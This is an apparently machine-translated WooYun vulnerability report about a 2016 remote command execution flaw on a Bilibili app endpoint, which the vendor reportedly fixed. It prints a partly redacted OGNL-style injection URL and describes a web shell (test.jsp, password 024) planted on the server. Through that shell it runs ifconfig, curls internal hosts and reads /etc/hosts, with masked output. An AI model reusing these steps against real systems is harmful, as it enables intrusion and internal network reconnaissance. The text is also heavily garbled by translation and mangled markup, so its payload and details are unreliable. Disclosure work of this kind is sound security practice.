漏洞标题 Artifact只有bilibili一个站命令执行shell 相关制造商 Bilibili.com 漏洞作者 过路人 提交时间 2016-06-27 13: 01 公共时间 2016-06-27 17: 59 漏洞类型 命令执行 危险等级 高 自我评估等级 20 漏洞状态 制造商已修复 标签标签 远程命令执行 漏洞详细信息 http://app.bilibili.com/bangumi/getVersion.ver?method: [email  protected]/* @ [email  protected]/* [email  protected]/* [email  protected]/* [email  protected]/*。[email  protected]/* [email  protected]/* [email  protected]/* g＆amp; q=com.opensymphony.xwork2.dispatcher.HttpServletRequest＆amp; r=com.opensymphony.xwork2.dispatcher.HttpServletResponse＆amp; q=/＆安培; G=％3 C-＆安培; G= - ％3E＆安培; U=％7C - ＆GT; | /数据/应用/bangumi_server/bangumi/|＆LT; - 通过了一个shell http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=ifconfig http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.16 我可以简单地检测内联网，恐怕你会反侵，我不会搞。 http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=curl%20172.18.9.21 http://app.bilibili.com/bangumi//test.jsp?pwd=024&l=cat/etc/hosts ***** alhost ***** ***** 222D ***** ********** 我想要的***** ***** ***** - localhost ***** ***** P6-人***** ***** - ***** allro *****机器人。***** ***** i.bilib ***** ***** unt.bili ***** ***** w.bilib ***** ***** ngzi.bili ***** *****。app.bili ***** ***** app.bil ***** ***** i.bilib ***** ***** en.bili ***** ***** angumi.bi ***** 总共执行了几个订单，请自行检查系统日志。上传 漏洞证明： 修理计划： 补丁，挂起并保存脚踢开发。 版权声明：请注明出处。居民A @乌云